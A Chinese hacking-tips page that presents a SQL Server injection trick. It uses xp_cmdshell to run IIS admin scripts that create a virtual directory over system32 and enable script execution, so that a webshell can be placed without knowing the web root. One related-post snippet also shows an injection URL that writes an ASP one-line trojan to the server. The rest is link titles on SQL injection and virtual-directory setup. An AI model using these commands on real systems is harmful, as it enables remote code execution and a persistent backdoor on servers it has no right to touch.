SQL注入建立虚拟目录,找Web绝对路径!
我们很多情况下都遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,这一招不错:
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"'
建立虚拟目录win,指向c:\winnt\system32
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'
让win句有解析asp脚本权限
exec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/"
删除虚拟目录。
找不到web绝对路径的一种解决办法,
http://21o.net/h4x0r
403错误,表示虚拟目录建好了。。。
相关推荐
-
SQL注入建立虚拟目录,找Web绝对路径!
我们很多情况下都遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,这一招不错: exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"' 建立虚拟目录win,指向c:\winnt\system32 exe
-
sql注入建立虚拟目录
sql注入建立虚拟目录,免得找web绝对路径---------------------------------------------------------------- 我们很多情况下都遇到sql注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,这一招不错: exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l&qu
-
sql server注入建立虚拟目录的方法
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"' 建立虚拟目录win,指向c:\winnt\system32 exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.
-
CMD下建立虚拟目录的方法
以下是丑要饭的<web数据分离> web 和 数据分离,有Pcanywhere,数据库服务器有 IIS, cscript.exe c:\inetpub\adminscripts\adsutil.vbs get w3svc/1/serverbindings 得到第一个Web服务的端口 cscript.exe c:\inetpub\adminscripts\adsutil.vbs create w3svc/1/root/wodexi/ IisWebVirtualDir创建一个虚拟目录wode
-
最详细的SQL注入相关的命令整理 (转)第1/2页
1. 用^转义字符来写ASP(一句话木马)文件的方法: ? http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';-- ? echo ^<%execute^(reques
-
用C语言winform编写渗透测试工具实现SQL注入功能
目录 用C语言winform编写渗透测试工具使SQL注入 一.SQL注入 二.实现步骤 三.代码实现 四.软件使用步骤 用C语言winform编写渗透测试工具使SQL注入 一.SQL注入 原理: SQL注入是指攻击者在Web应用程序中事先定义好的查询语句的结尾加上额外的SQL语句,这些一般都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作.(危害:盗取网站敏感信息.绕过验证登录网站后台.借助数据库的存储过程进行权限提升等操作).造成的原因是程序员在编写Web程序时,没有对浏览
-
一篇文章了解SQL注入漏洞
目录 SQL注入漏洞原理 SQL注入内容 注入条件 SQL注释符与注入流程 SQL注入分类 SQLMap 分类 接受请求类型区分 注入数据类型的区分 SQL注入思路 手工注入思路 SQL 详细注入过程 总结 SQL注入漏洞原理 漏洞原理 web页面源代码对用户提交的参数没有做出任何过滤限制,直接扔到SQL语句中去执行,导致特殊字符改变了SQL语句原来的功能和逻辑.黑客利用此漏洞执行恶意的SQL语句,如查询数据.下载数据,写webshell.执行系统命令以此来绕过登录权限限制等. 检测方法
-
PHP编程之设置apache虚拟目录
apache虚拟目录设置方法分享,供大家参考,具体内容如下 1.开启"虚拟目录配置文件"httpd-vhosts.conf 文件路径:\wamp\bin\apache\apache2.4.9\conf\extra\httpd-vhosts.conf 将以下配置: # Virtual hosts # Include conf/extra/httpd-vhosts.conf 改为: # Virtual hosts Include conf/extra/httpd-vhosts.co
-
C#创建IIS虚拟目录的方法
本文实例讲述了C#创建IIS虚拟目录的方法.分享给大家供大家参考.具体分析如下: DirectoryEntry是.Net给我们的一大礼物,他的名字我们就知道他的功能--目录入口.使用过ADSI的人都知道操作IIS,WinNT这些时,我们还需要提供他们的Path,操作IIS时,这个Path的格式为: 复制代码 代码如下: IIS://ComputerName/Service/Website/Directory ComputerName:即操作的服务器的名字,可以是名字也可以是IP,经常用的就是lo
-
数据库之SQL注入原理以及过程的简单介绍
1.产生SQL注入原因 开发代码的时候没有全面考虑到网络安全性,特别是在用户交互时,没有考虑到用户提交的信息中可能破坏数据库,没有对输入的数据进行合法的过滤.SQL 注入过程目的性是非常强的,其主要目标是 Web 应用的后台数据库,从数据库中获取信息和授予较高的权限,它先破坏数据库,再对数据库服务器进行破坏. 2.SQL注入原理 首先要了解web网站的架构: Web 网站架构,总体结构由 Web 服务器端.客户终端和通信协议三大部分组成. 表示层是指用户交互的界面.用户在使用时在表示层输入需求,
随机推荐
- Windows下PostgreSQL安装图解
- sql2005 批量更新问题的解决方法
- 微信小程序 图片加载(本地,网路)实例详解
- C++中的extern “C”用法详解
- Objective-C中编程中一些推荐的书写规范小结
- 把Jar文件转成exe安装文件的实现方法
- java 用递归获取一个目录下的所有文件路径的小例子
- Js与下拉列表处理问题解决
- ASP.NET MVC制作404跳转实例(非302和200)
- javascript自执行函数
- Yii结合CKEditor实现图片上传功能
- Dropzone.js实现文件拖拽上传功能(附源码下载)
- mongodb 3.2.5安装详细过程
- 影响jQuery使用的14个方面
- Microsoft Expression Web 简体中文正式版 官方下载地址
- eclipse+myeclipse 环境配置方法
- 浅谈SpringBoot优化技巧
- Android中使用imageviewswitcher 实现图片切换轮播导航的方法
- Android Shader应用开发之雷达扫描效果
- DOS的重定向命令使用方法以及在安全方面的应用